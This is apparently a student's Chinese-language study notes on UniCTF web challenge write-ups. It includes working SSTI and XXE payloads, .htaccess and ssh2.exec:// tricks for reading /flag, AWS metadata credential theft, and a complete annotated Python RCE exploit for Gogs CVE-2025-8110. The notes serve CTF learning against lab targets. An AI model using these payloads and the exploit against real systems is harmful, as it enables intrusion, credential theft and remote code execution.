unictf学习

unictf 的wp中译中，包含名词解释和代码批注，全手打无粘贴（链接和回显除外）

intrasight

https://www.ctfplus.cn/problem-detail/2019277782340603904/description

打开界面判断是ssrf，预览80端口请求成功，预览https://111222.free.beeceptor.com也请求成功，说明可以出网

出网可以主动访问公网ip和域名，可以直接nc反弹shell到自己的公网vps（云服务器），远程下载利用脚本（靶机支持wget,cuel,certutil等下载命令），dnslog外带信息

不出网只能访问本地和内网，只能本地提权，读取和写入本地文件，内网横向移动（有跳板，很像ssrf）。本地编译exp，内网端口扫描

但是看题目应该是本地读取文件，不需要用到外网，还看到了允许ws协议，提示有internal-services: [public_web, admin_panel, w*_*e*1*r]

然后，然后就不会做了，看wp

还能用到ssti

openapi.json也叫swagger.json,是遵循OpenAPI规范的JSON格式文件

所以可以直接访问http://127.0.0.1:8001/openapi.json

返回

{
  "status": 200,
  "headers": {
    "content-type": "application/json",
    "x-service": "admin_panel"//属于8001端口的admin_panel服务，对应前端提示，所有看到admin提示要想一想8001和openapi
  },
  "history": [],
  "body": {
    "openapi": "3.1.0",
    "info": {
      "title": "admin_panel",
      "version": "0.1.0"
    },
    "paths": {//注意实在8001端口的
      "/status": {
        "get": {
          "summary": "Status Page",
          "operationId": "status_page_status_get",
          "responses": {
            "200": {
              "description": "Successful Response",
              "content": {
                "application/json": {
                  "schema": {}
                }
              }
            }
          }
        }
      },
      "/api/debug/config": {
        "get": {
          "summary": "Debug Config",
          "operationId": "debug_config_api_debug_config_get",
          "responses": {
            "200": {
              "description": "Successful Response",
              "content": {
                "application/json": {
                  "schema": {}
                }
              }
            }
          }
        }
      },
      "/redirect_ws": {
        "get": {
          "summary": "Redirect Ws",
          "operationId": "redirect_ws_redirect_ws_get",
          "responses": {
            "200": {
              "description": "Successful Response",
              "content": {
                "application/json": {
                  "schema": {}
                }
              }
            }
          }
        }
      }
    }
  }
}

依次访问

/status

{
  "status": 200,
  "headers": {
    "content-type": "text/html; charset=utf-8",
    "x-service": "admin_panel"
  },
  "history": [],
  "body": "<!DOCTYPE html>\n<html lang=\"zh-CN\">\n\n<head>\n  <meta charset=\"UTF-8\">\n  <title>IntraSight Status</title>\n</head>\n\n<body>\n  <h3>内部面板在线</h3>\n  <p>提示：调试信息可查看 /api/debug/config</p>\n</body>\n\n</html>"
}

/api/debug/config

{
  "status": 200,
  "headers": {
    "content-type": "application/json",
    "x-service": "admin_panel"
  },
  "history": [],
  "body": {
    "version": "1.0",
    "ws_internal": "ws://127.0.0.1:9000/ws"
  }
}

/redirect_ws

{
  "status": 404,//补全知识点，这是最终的状态码是404，但是并不代表页面完全不存在，可能是连接协议错误
  "headers": {
    "content-type": "application/json"
  },
  "history": [
    {
      "status": 302,
      "location": "ws://127.0.0.1:9000/ws?token=125f8fa0bf994f4abf4c208e1c94be75"
    }
  ],
  "body": {
    "detail": "Not Found"
  }
}

原来w*_*e*1*r是ws_render的意思

ws特性

一次握手，建立长连接，可以篡改Sec-WebSocket-Key,Sec-WebSocket-version的握手参数

还有fuzz的不仅是端口，还有路径，只访问端口还是会返回404

访问 ws://127.0.0.1:9000/ws?token=125f8fa0bf994f4abf4c208e1c94be75

{
  "ws": "ok",
  "message": "handshake success",
  "welcome": 
  "{\"error\":\"invalid origin 'None' ;//鉴权失败//origin为none
  X-Internal-Token header must match ?token;//XIT请求头的值和？token不匹配
  token expired or invalid (try /redirect_ws)\"}"//token过期或无效
}

看了wp说这才是ssrf的真正利用点

要post请求

POST /fetch?url=ws://127.0.0.1:9000/ws?token=f8c9668761ae4716839b60c98b898323 HTTP/1.1
Origin: http://127.0.0.1
X-Internal-Token: f8c9668761ae4716839b60c98b898323
Host: 80-b911d573-c789-46c2-9df7-f402544d4599.challenge.ctfplus.cn

返回

HTTP/1.1 200 OK
Content-Length: 113
Content-Type: application/json
Date: Fri, 06 Feb 2026 03:42:06 GMT
Server: uvicorn
Connection: close

{"ws":"ok","message":"handshake success","welcome":"{\"error\":\"token expired or invalid (try /redirect_ws)\"}"}

到这一步复现失败了，刷新redirect_us发现token值一直在刷新…

然后一直到不了wp展示的结果:

{
  "service": "IntraSight Template Preview",
  "version": "1.0",
  "protocol": {
    "action": "render",
    "template": "",
    "context": {"optional": ""}
  }
}

为什么啊为什么

继续往下

在template处传payload即可

payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag').read() }}"

GlyphWeaver

看前端源码是jinja2，怀疑是ssti，结果{{7*7}}被拦截，好不容易用全角花括号绕过，结果回显原文·，怀疑不是ssti，寄，看wp

Online namecard generator for bilingual teams. Supports typography cleanup (CJK-friendly).
双语团队在线名片生成器。支持排版清理（友好中日韩）。

CJK-friendly暗示服务端会针对中日韩文字和符号的使用习惯做兼容处理

NFKC：兼容合成型规范化

不用记复杂编码，只记和 SSTI 相关的符号 / 数字 / 字母转换即可，这是题目提示里重点强调的：

输入的兼容字符（全角 / 特殊）	NFKC 转换后的标准字符（半角）	对应的 Unicode 编码变化
全角大括号 ｛ ｝	半角大括号 { }	U+FF5B→U+007B；U+FF5D→U+007D
全角小括号 （ ）	半角小括号 ( )	U+FF08→U+0028；U+FF09→U+0029
全角方括号 ［ ］	半角方括号 [ ]	U+FF3B→U+005B；U+FF3D→U+005D
全角等号 ＝	半角等号 =	U+FF1D→U+003D
全角数字 ０-９	半角数字 0-9	U+FF10→U+0030 等
全角字母 ａ-ｚ/Ａ-Ｚ	半角字母 a-z/A-Z	U+FF41→U+0061 等
全角符号 ！@#$%^&*	半角符号！@#$%^&*	对应半角编码

全角占两个字位符（一个中文宽度），半角占一个字位符

｛｛７＊７｝｝

结果回显原文，说明预览只有一次渲染，需要寻找二次触发点

渲染：模板引擎　解析　模板内容，把模板语法｛｛｝｝执行后，生成最终普通字符串

预览：传template: "｛｛config｝｝" → 服务端用模板引擎渲染这个内容 → 把渲染结果（比如 config 的内容）展示给你

结果是二次触发点在Ｅｘｐｏｒｔ　Console

心碎了，关键就是全角符号和二次渲染，当时到底卡到哪里了没做出来

｛｛cycler．＿＿init＿＿．＿＿globals＿＿．＿＿builtins＿＿．open（'/flag'）．read（）｝｝

SecureDoc

这是唯一做出来的题目，因为它是cve，可以直接套

CVE-2025-66516

开题是文本文档提取工具界面，仅接受pdf格式，可以从pdf中提取文本内容，支持解析pdf表单，交互式元素，以及基于xfa的动态表单，可以获取文档的元数据信息

xfa:adobe推出的一种可以输入验证，下拉菜单，按钮等复杂交互元素，与后端系统对接，实现数据的实施提交与加载

由于 XFA 依赖 Adobe 专属技术，很多通用 PDF 阅读器不支持直接解析，需要专业工具（如 SecureDoc Parser）来处理。

xxe漏洞

<?xml version="1.0" encoding="UTF-8"?>  <!-- 1. XML文档声明：告诉解析器这是XML文件，编码UTF-8 -->

 <!--定义DTD--><!--定义外部实体：读取本地flag文件-->
<!DOCTYPE xdp:xdp [      

  <!ENTITY xxe SYSTEM "file:///flag">   
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<!--  XML根节点：符合xdp命名空间规范（适配服务端解析要求） -->
  <template>
    <subform>
      <field name="exploit">
        <value>
          <text>FLAG_CONTENT_BELOW:
&xxe; <!-- 6. 引用自定义实体xxe：解析时会替换成/flag文件的内容 -->

FLAG_CONTENT_ABOVE</text>
        </value>
      </field>
    </subform>
  </template>
</xdp:xdp>

mio’s waf

极难题目看不进去，明天填坑

ez Upload & ez Upload Revenge

开题是文件上传，禁用了？$&;|<我自己测试还禁止了<?php,所以用GIFA绕过，传是传成功了，但是解析原图，所以传个.htaccess,回显Forbidden keywords detected!禁用关键词，到这里我就做不出来了，看wp

碎了，我以为文件名htaccess被禁了，结果是文件里的内容被禁了，早知道应该多测试一下

突然想起isctf的mv超绝参数注入

我要传的htaccess内容是

AddType application/x-httpd-php .jpg

测试了一下是把php过滤了，大小写绕过也不行

受wp启发去搜.htaccess的bypass了，试了

Options +ExecCGI
AddHandler cgi-script .xx

然后传1.xx

#! /bin/bash

echo Content-type: text/html

echo ""

cat /flag

回显原文

https://www.anquanke.com/post/id/205098

反正把这篇博客的内容都试了一遍，都不行，为什么啊为什么

问了ai是文件执行命令权限没开（？？？）

所以直接让htaccess重写

RewriteEngine On
RewriteCond expr "file('/flag') =~ /(.+)/"
RewriteRule .* - [E=FLAG_CONTENT:%1]
Header set X-Test-Expe "%{FLAG_CONTENT}e"

然后新建任意文件，回显的X-Test-Expe自带flag

一鸣唱吧

以为是写马题，没想到是路径爆破

上传一个文件会得到它的保存目录：uploads/UNiCTF202604.txt

再次上传，会发现规律

会保留上传的后缀名，并且只有后两位数字改变。那么可以遍历一下uploads下是否存在其他的文件。

看到两个好用的工具

seq（Linux 系统自带的序列生成工具）；

seq -w 0 99 > num.txt

ffuf 执行文件名字典爆破；

运行wp命令不通，新的命令

ffuf -u http://80-3d190993-53d1-4f13-8682-26d9271cb571.challenge.ctfplus.cn/uploads/UNiCTF2026W1W2W1W2 -w /tmp/num.txt:W1 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-extensions-lowercase.txt:W2

关键参数解释：

参数	含义
-u	指定要爆破的 URL 模板（W1/W2是变量，会被字典内容替换）
-w	加载字典文件，格式：字典路径:变量名（支持多字典组合爆破）
num.txt:W1	把num.txt的内容赋值给变量W1（数字）
raft-medium...:W2	把后缀字典赋值给变量W2（后缀）

不如bp

扫出来有一个 UNiCTF202667.db,和 UNiCTF202638.php

关于php，是phpinfo。

https://internal-api-drive-stream.feishu.cn/space/api/box/stream/download/preview/J73GbQSh1oyPEAxMK5RcjoSEnQg/?preview_type=16

在registered php streams看到开启了ssh2服务

ssh2是 PHP 的一个扩展，专门用于和 SSH 服务器交互，核心函数包括：

核心函数	功能
ssh2_connect()	连接远程 SSH 服务器
ssh2_auth_password()	用账号密码验证 SSH 登录
ssh2_exec()	在 SSH 服务器上执行系统命令
ssh2_scp_send()/ssh2_scp_recv()	上传 / 下载文件（SCP 协议）
ssh2_shell()	获取 SSH 交互式 shell

ssh2模块启用，说明服务器大概率开启了 SSH 服务（端口 22）

关于db，是sqlite

1 admin 7fef6171469e80d32c0559f88b377245 1
2 ctfer 58d506617a1e20a9d87ab5a3debcb151 0
3 11 6512bd43d9caa6e02c990b0a82652dca 0

用账密登录，登不进去，被哈希加密了

7fef6171469e80d32c0559f88b377245 是一个 32 位的十六进制哈希值，MD5 哈希的特征就是 32 位十六进制字符串）

密码是admin888

登录后点击曲库发现多了一个功能

管理员内部预览 (Dev Mode)
当前 Web 根目录: /var/www/html

Resource URI: 
例如: file:///var/www/html/index.php

（是的就是不粘图片，以为至今没搞懂图片路径格式）

直接读取file:///flag会返回错误。那么试着读取源码。

file:///var/www/html/download.php

经验加一

<?php
// 引入数据库连接
require_once 'includes/db.php';

if (session_status() === PHP_SESSION_NONE) { session_start(); }

if (!isset($_SESSION['user'])) {
    require_once 'includes/header.php';
    die("<div class='container'><p class='error'>请先登录会员系统！/ Access Denied</p></div>");
    require_once 'includes/footer.php';
}



if (isset($_GET['preview']) && $_GET['preview'] === "true" && isset($_SESSION['is_admin']) && $_SESSION['is_admin'] == 1) {
    

    $format = isset($_GET['format']) ? $_GET['format'] : '';

    // ========================================
    // 安全过滤：协议黑名单检查
    // ========================================
    $dangerousProtocols = [
        'php://',
        'data://',
        'phar://',
        'zip://',
        'compress.zlib://',
        'compress.bzip2://',
        'zlib://',
        'glob://',
        'expect://',
        'input://',
        'http://',
        'https://',
        'ftp://',
        'ftps://',
        'dict://',
        'gopher://',
        'tftp://',
        'ldap://',
        'ssh2.sftp://',
        'ssh2.scp://',
        'ssh2.tunnel://',
        'rar://',
        'ogg://',
    ];

    foreach ($dangerousProtocols as $protocol) {
        if (stripos($format, $protocol) !== false) {
            require_once 'includes/header.php';
            echo "<div class='container'>";
            echo "<p class='error'>⚠️ 安全警告：禁止使用该协议 " . htmlspecialchars($protocol) . "</p>";
            echo "<p>系统检测到潜在的安全风险，已拦截此次请求。</p>";
            echo "</div>";
            require_once 'includes/footer.php';
            exit;
        }
    }
    // ========================================

    $full_path = $format;

    $is_viewing_source = (strpos($format, 'file://') === 0);

    if ($is_viewing_source) {
        header('Content-Type: text/plain; charset=utf-8');
    } else {
        header('Content-Type: text/html; charset=utf-8');
        require_once 'includes/header.php';
        echo "<div class='container'><h2 class='neon-text'>🔧 管理员预览控制台</h2>";
        echo "<p class='message'>正在尝试加载资源流: <strong>" . htmlspecialchars($full_path) . "</strong></p>";
        echo "<div style='background: #000; padding: 15px; border: 1px solid #333; font-family: monospace; color: #0f0; white-space: pre-wrap;'>";
    }

    try {

        $handle = @fopen($full_path, 'r');

        if ($handle) {
            $content = stream_get_contents($handle);
            
            if ($is_viewing_source) {
                echo $content; 
            } else {
                echo htmlspecialchars($content); 
            }
            fclose($handle);
        } else {
            echo "Error: 资源加载失败。\n";
            echo "可能的原因为：\n";
            echo "1. 文件路径不存在\n";
            echo "2. 权限不足 (Permission Denied)\n";
            echo "3. 协议格式错误\n";
        }

    } catch (Exception $e) {
        echo "System Error: " . $e->getMessage();
    }


    if (!$is_viewing_source) {
        echo "</div></div>"; // 关闭 console 和 container
        require_once 'includes/footer.php';
    }
    
    exit; 

}



//普通会员文件下载

require_once 'includes/header.php';

if (isset($_GET['file'])) {
    $file = $_GET['file'];

    if (strpos($file, '..') === false && strpos($file, '/') === false) {
        $filepath = "uploads/" . $file;
        if (file_exists($filepath)) {
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
            header('Content-Length: ' . filesize($filepath));
            readfile($filepath);
            exit;
        } else {
             echo "<p class='error'>文件不存在或已被移除。</p>";
        }
    } else {
         echo "<p class='error'>非法请求。</p>";
    }
}

$admin_panel = '';
if (isset($_SESSION['is_admin']) && $_SESSION['is_admin'] == 1) {
    $current_dir = __DIR__; 
    $admin_panel = <<<HTML
    <div class="admin-panel">
        <h3 class="neon-text">🔧 管理员内部预览 (Dev Mode)</h3>
        <p style="color: gray; font-size: 0.8em;">当前 Web 根目录: {$current_dir}</p>
        
        <form method="get" target="_blank">
            <input type="hidden" name="preview" value="true">
            <label>Resource URI:</label>
            <input type="text" name="format" placeholder="例如: file://{$current_dir}/index.php" style="width: 70%;" required>
            <button type="submit">加载资源</button>
        </form>
    </div>
HTML;
}
?>

<h2 class="neon-text">🎵 一鸣曲库 (归档中心)</h2>
<p>这里存放着系统归档文件。普通会员可根据文件名下载。</p>

<div style="margin-top: 30px; padding: 20px; background: rgba(0,0,0,0.3);">
    <h3>📥 歌曲/文件下载</h3>
    <form method="get">
        文件名: <input type="text" name="file" placeholder="输入文件名, 如 MGSG202500.mp3">
        <button type="submit">下载文件</button>
    </form>
</div>

<?php 
echo $admin_panel;
require_once 'includes/footer.php'; 
?>

PHP 的fopen()函数不只是能打开本地文件 / HTTP 链接，还支持自定义流封装协议（比如file://、http://、php://）；而ssh2扩展为 SSH 功能新增了ssh2.exec://等协议，让你可以像 “打开文件” 一样，通过fopen()执行远程 SSH 命令

语法

ssh2.exec://user:pass@ip/cmd

协议片段	通俗解释	必选 / 可选	示例
ssh2.exec://	协议头，告诉 PHP：这是 ssh2 扩展的 “执行命令” 协议	必选	-
user	远程 SSH 服务器的登录用户名（比如 root、ubuntu）	必选	root
pass	远程 SSH 服务器的登录密码	必选	123456
@	分隔符，分隔 “账号密码” 和 “IP 地址”	必选	-
ip	远程 SSH 服务器的 IP 地址（或域名），可加端口（默认 22）	必选	127.0.0.1（本机）、192.168.1.100:2222（非默认端口）
/	分隔符，分隔 “IP 地址” 和 “要执行的命令”	必选	-
cmd	要在远程 SSH 服务器上执行的系统命令	必选	cat /flag、whoami、ls /tmp

尝试写入文件。

/download.php?preview=true&format=ssh2.exec://ctfer:duhgrl@127.0.0.1:22/id > /var/www/html/1.txt;

id > /var/www/html/1.txt;

• id：Linux 系统命令，用于查看当前用户身份（UID/GID/ 所属组）；
• > /var/www/html/1.txt：将 id 命令的输出重定向到网站根目录下的 1.txt 文件；
• ;：命令分隔符，可追加更多命令（如 ;cat /etc/passwd）。

然后，最后一部分没复现出来，直接复制wp的回显加载不出来

？？？

CloudDiag

开题看到页面底部文字提示

CloudDiag runs in a cloud environment with instance roles for diagnostics.

暗示AWS，ssrf

云环境元数据：云服务商为虚拟机提供的内置服务，实例可用通过特定的本地网址访问自身的配置信息

IMDSv1：http直接访问http://169.254.169.254/latest/meta-data/即可获取实例ID，IAM角色，安全组等信息

IMDSv2：加入了会话验证机制，需要先请求一个临时令牌，再用令牌访问元数据，提升了安全性。

然后我用admin弱口令，一开始就偏了

元数据（比如 AWS 的169.254.169.254）地址是系统及资源，只有root账户的操作历史，配置文件才会记录这些信息，而admin是应用级用户，根本接触不到系统级的元数据配置

弱口令root,root123

其实进入网页我根本不清楚该网页的应用场景和生活用途，笑死我了连题都没读懂，英语＋代码被薄纱乐

CloudDiag可能是企业云运维诊断平台，用于

云实例故障排查（如 AWS EC2 实例）

云环境安全巡检（企业的安全团队会定期创建 “legacy metadata check” 这类任务，扫描云实例是否仍在使用不安全的旧版元数据接口，及时修复漏洞，避免黑客通过该接口窃取云凭证。）

多租户云资源监控（在多租户的云管理平台中，管理员（如界面中的 root 用户）可以通过该平台统一查看所有业务部门的诊断任务，确保各租户的云资源运行合规，避免单个租户的风险影响整个云环境。）

diagnostic task :诊断任务，提交一条用于排查云问题的指令，比如ping

Legacy metadata check :对“遗留元数据接口”的检查任务，root执行该任务是为了检查旧版元数据接口，防止黑客通过该接口窃取凭证

所以应该重点关注这里，进行信息搜集

Cloud Exporer: 云资源浏览器，用于查看和管理云资源

S3 存储桶（S3 Bucket）是亚马逊云服务（AWS）推出的 对象存储服务 的核心载体

点开legacy metedata check

http://metadata:1338/latest/meta-data/iam/security-credentials/获取实例的 IAM 角色凭证（临时访问密钥，aws默认一小时，仅允许读取特定s3存储桶，只能被绑定该角色的实例使用，其他设备无法复用）。

config preview:配置预览，展示从 Config URL 获取到的前 2KB 数据。这里显示的 clouddiag-instance-role 是当前云实例绑定的 IAM 角色名称，通过这个角色可以访问特定的云资源（如 S3 存储桶）。

已知这个就可以在security-credentials/后面加这个名称继续深入访问

parsed Config:解析后的配置，系统会尝试对获取到的元数据进行结构化解析。

这里显示 (parse failed) 说明返回的内容格式不符合预期，可能是数据不完整或格式错误。

Execution Log :重点看到这个运行日志里面有[INFO] Report uploaded to object storage表示诊断报告已上传到云对象存储（如 S3），暗示后续可以尝试访问该存储位置获取报告。

然后我们在已有url后面加入角色名称new task继续查询

回显Parsed Config

{
  "AccessKeyId": "AKIAF97EEF44BDAE4743",
  "Code": "Success",
  "Expiration": "2026-02-06T09:02:34.750322Z",
  "SecretAccessKey": "45d7445bbf364cb08ddc9d7685213764501007b31c5f4413a0f914f50f2bb530",
  "Token": "c10c444cb7994d7282710f52697cd5c50d82c701c8db4bb58d46eecb55655868",
  "Type": "AWS-HMAC"
}

获取密钥后在云资源浏览器里面查询发现三个桶

clouddiag-public
clouddiag-reports
clouddiag-secrets

填入secrets桶

回显

flags/runtime/flag-067a118342f5439ab95d04bd31a9ecec.txt (54 bytes)
notes/rotation.txt (77 bytes)

然后又看不懂不知道怎么填了，问ai！

Prefix（可选）

这是文件路径的前缀。因为目标文件路径是 flags/runtime/flag-067a118342f5439ab95d04bd31a9ecec.txt，你可以在这里填写 flags/runtime/ 来缩小查询范围。

Object Key（可选）

这是文件的完整路径（或文件名），用来精确指定要获取的文件。

直接填写完整路径：flags/runtime/flag-067a118342f5439ab95d04bd31a9ecec.txt

得到flag

gogogos

这题我搜到cve了，但是当时没复现出来，爆炸

cve-2025-8110

Gogs 允许用户通过 API 修改仓库文件，但未正确校验文件类型，导致符号链接（symlink）可被篡改；

符号链接指向 Git 仓库的核心配置文件.git/config，修改符号链接等价于直接修改.git/config；

Git 的fsmonitor配置项是 “文件系统监视器”，会在 Git 执行add/commit等操作时调用指定命令，注入恶意命令后，Gogs 内部执行 Git 操作时就会触发命令执行（RCE）。

import requests
import os # 操作系统接口 #os.chmod()修改文件权限
import subprocess
import shutil
import base64
import sys
import time

import argparse

# Configuration

TARGET_BASE_URL = "http://localhost:3000" # 目标Gogs, 需要开放注册功能或已存在可登录用户
USERNAME = "aaa"   # 登录用户名
PASSWORD = "111111" # 登录密码
REPO_OWNER = "aaa" # 仓库所有者
REPO_NAME = "bbb"  # 仓库名称
SYMLINK_FILENAME = "test"   # 要创建的symlink文件名
TARGET_FILE = ".git/config" # symlink指向的目标文件，这里是git配置文件

# 派生常量
REPO_URL = f"{TARGET_BASE_URL}/{REPO_OWNER}/{REPO_NAME}.git"
API_URL = f"{TARGET_BASE_URL}/api/v1/repos/{REPO_OWNER}/{REPO_NAME}/contents/{SYMLINK_FILENAME}"

import stat #导入文件状态和权限相关的常量模块，比如stat.S_IWRITE可写权限

def on_rm_error(func, path, exc_info):#如果删除时出错
	# func 触发错误的原删除函数
    # path 出错文件的完整路径
    # exc_info 异常信息
    os.chmod(path, stat.S_IWRITE)#改为可写
    # 语法os.chmod(文件路径，权限值)
    try: # 我先试试执行下面的代码，如果出问题了就执行expect里的逻辑
        func(path)#重新执行删除操作
    except Exception:
        # Exception：python中所有异常的父类
        pass # 空语句，表示什么都不做

def setup_git_repo(): # 定义无参数函数，负责整个git仓库的搭建和推送流程
    print(f"[*] 设置本地git仓库以推送symlink '{SYMLINK_FILENAME}' -> '{TARGET_FILE}'...")#推送一个从STMLINK_FILENAME指向TABLE_FILE的符号链接
    
    if os.path.exists("temp_exploit_repo"):
        # os.path.exists(路径),返回布尔值
        try:
            shutil.rmtree("temp_exploit_repo", onerror=on_rm_error)# 递归删除文件
            # shutil.rmtree(path, ignore_errors=False, onerror=None) 
            #ignore_errors 默认false，出错时抛出异常
            #onerror 接一个错误回调函数，需接受三个参数
        except Exception as e:
            print(f"[!] 不能清除旧仓库: {e}")
            
    if not os.path.exists("temp_exploit_repo"):
        os.makedirs("temp_exploit_repo") #创建新的 temp_exploit_repo 目录
    os.chdir("temp_exploit_repo") #切换到这个新仓库目录
    
    try:
        subprocess.run(["git", "init"], check=True)
        #subprocess.run(...)：调用系统命令行执行 Git 命令。
        #["git", "init"]：等价于在终端执行 git init，初始化空的本地 Git 仓库。
        #check=True：如果命令执行返回非 0 退出码（失败），会抛出 CalledProcessError 异常。
        
        
        # 创建一个虚拟文件以首先提交（可选，但很好的做法）
        with open("README.md", "w") as f:
            f.write("# POC Repo") #创建 README.md 临时文件，写入# POC Repo
        subprocess.run(["git", "add", "README.md"], check=True)
        #将 README 文件加入 Git 暂存区。
        subprocess.run(["git", "commit", "-m", "Initial commit"], check=True) #提交暂存区内容，生成第一个提交记录（Git 推送至少需要 1 个提交，否则会失败）。
        
        # 使用 git hash-object 创建符号链接
        # 我们希望 SYMLINK_FILENAME 指向 TARGET_FILE
        print("[*]通过git对象手动创建符号链接……")
        # 1. 获取目标路径字符串的哈希值
        # 注意：echo -n 很重要，它可以避免产生换行符
        proc = subprocess.run(["git", "hash-object", "-w", "--stdin"], input=TARGET_FILE.encode(), stdout=subprocess.PIPE, check=True)
        blob_hash = proc.stdout.decode().strip()
        #Git 中所有文件内容都以 “Blob 对象” 存储，每个 Blob 对应一个唯一哈希值；符号链接本质是 “存储目标路径字符串的 Blob 对象 + 特殊文件模式”。 
        #-w：将生成的 Blob 对象写入 Git 对象库（.git/objects）。
        #--stdin：从标准输入（stdin）读取内容，而非文件。
        #input=TARGET_FILE.encode()：将 TARGET_FILE（如 /etc/passwd）作为输入传给该命令。
        #stdout=subprocess.PIPE：捕获命令输出（即 Blob 对象的哈希值）。
        
        
        # 2. 作为符号链接添加到索引（模式120000）
        subprocess.run(["git", "update-index", "--add", "--cacheinfo", "120000", blob_hash, SYMLINK_FILENAME], check=True)
        #--add：添加新文件到暂存区。
		#--cacheinfo：指定 “缓存信息”（模式 + 哈希 + 文件名）。
		#120000：Git 中符号链接的专属文件模式（普通文件是 100644，可执行文件是 100755），这个模式告诉 Git “这是一个符号链接”。
		# blob_hash：之前生成的目标路径字符串的 Blob 哈希。
		# SYMLINK_FILENAME：要创建的符号链接文件名。
        
        
        
        # 验证索引中的模式
        proc_ls = subprocess.run(["git", "ls-files", "-s", SYMLINK_FILENAME], stdout=subprocess.PIPE, check=True)
        print(f"[*] 已验证的git索引模式: {proc_ls.stdout.decode().strip()}")
         # git ls-files -s：列出暂存区文件的详细信息（-s 表示 “详细模式”，包含文件模式、哈希、文件名）。
		# 输出示例：120000 a1b2c3d4... 0 symlink.txt，其中 120000 验证了符号链接模式设置成功。
		# 打印日志确认模式正确，避免后续推送出错。
        
        
        
        # 3. 合并
        subprocess.run(["git", "commit", "-m", "Add malicious symlink"], check=True)
        
        # 4. 推送到远程
        # 根据凭据构建url
        # 处理协议 (http/https)
        protocol = REPO_URL.split("://")[0]
        rest = REPO_URL.split("://")[1]
        auth_repo_url = f"{protocol}://{USERNAME}:{PASSWORD}@{rest}"
        
        print(f"[*] Pushing to {REPO_URL}...")
        subprocess.run(["git", "remote", "add", "origin", auth_repo_url], check=True)
        subprocess.run(["git", "push", "-u", "origin", "master", "-f"], check=True)
        print("[+] Symlink pushed successfully.")
        
    except subprocess.CalledProcessError as e:
        print(f"[-] Git operation failed: {e}")
        sys.exit(1)
    finally:
        os.chdir("..")

def trigger_rce(rce_command, proxies=None):
    print(f"[*] 通过覆盖触发远程代码执行'{SYMLINK_FILENAME}' via API...")
    print(f"[*] 要执行的命令: {rce_command}")
    
    # 构造恶意的 git 配置
    # 我们包含了标准的核心设置，以避免立即破坏 git。
    # fsmonitor 是关键的有效载荷
    config_payload = f"""[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
    fsmonitor = "{rce_command}"
[remote "origin"]
    url = {REPO_URL}
    fetch = +refs/heads/*:refs/remotes/origin/*
"""
    
    # Base64 encode the content
    content_b64 = base64.b64encode(config_payload.encode()).decode()
    
    payload = {
        "content": content_b64,
        "message": "Trigger RCE",
        "branch": "master"
    }
    
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"token {get_token()}" if False else None # We use Basic Auth
    }
    
    # Try to create a token first if Basic Auth fails or just use it
    token = create_token(proxies)
    if token:
        print(f"[+] Obtained token: {token}")
        headers["Authorization"] = f"token {token}"
        auth = None # Do not use basic auth if we have token
    else:
        print("[!] Could not create token, falling back to Basic Auth (which failed previously with 401)")
        auth = (USERNAME, PASSWORD)
    
    print(f"[*] Sending PUT request to {API_URL}")
    try:
        response = requests.put(API_URL, json=payload, auth=auth, headers=headers, proxies=proxies)
        
        print(f"[*] Response Status Code: {response.status_code}")
        print(f"[*] Response Body: {response.text}")
        
        if response.status_code == 500:
            print("[+] Received 500 Internal Server Error. This is EXPECTED if the exploit worked!")
            print("    The 'fsmonitor' command is executed when Gogs tries to run 'git add' internally.")
            print(f"    Check if the command '{rce_command}' was executed on the server.")
        elif response.status_code == 200 or response.status_code == 201:
            print("[-] Received 200/201. The file was updated. Check if RCE triggered.")
        else:
            print("[-] Unexpected response status.")
            
    except Exception as e:
        print(f"[-] Request failed: {e}")

def create_token(proxies=None):
    print("[*] Attempting to create an access token via API...")
    url = f"{TARGET_BASE_URL}/api/v1/users/{USERNAME}/tokens"
    auth = (USERNAME, PASSWORD)
    payload = {"name": f"exploit_token_{int(time.time())}"}
    
    try:
        response = requests.post(url, json=payload, auth=auth, proxies=proxies)
        if response.status_code == 201:
            return response.json().get("sha1")
        else:
            print(f"[-] Failed to create token. Status: {response.status_code}, Body: {response.text}")
            return None
    except Exception as e:
        print(f"[-] Token creation request failed: {e}")
        return None

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Gogs CVE-2025-8110 RCE Exploit")
    parser.add_argument("--command", default="touch /tmp/GOGS_RCE_SUCCESS_CVE_2025_8110", help="Command to execute on the server")
    parser.add_argument("--skip-setup", action="store_true", help="Skip git repo setup (use if already pushed)")
    parser.add_argument("--proxy", default=None, help="Proxy URL (default: None)")
    args = parser.parse_args()

    proxies = None
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}
        print(f"[*] Using proxy: {args.proxy}")

    if not args.skip_setup:
        setup_git_repo()
        # Wait a moment to ensure consistency
        time.sleep(2)
    
    rce_command = args.command
    # Escape double quotes for git config
    rce_command = rce_command.replace('"', '\\"')

    # For verification: Print the exact command being injected
    print(f"[*] Injected fsmonitor command: {rce_command}")

    trigger_rce(rce_command, proxies=proxies)

为什么注释都是英文啊，读懂wp难上加难

目前uniwp全部看完，复现失败2个，看不进去两个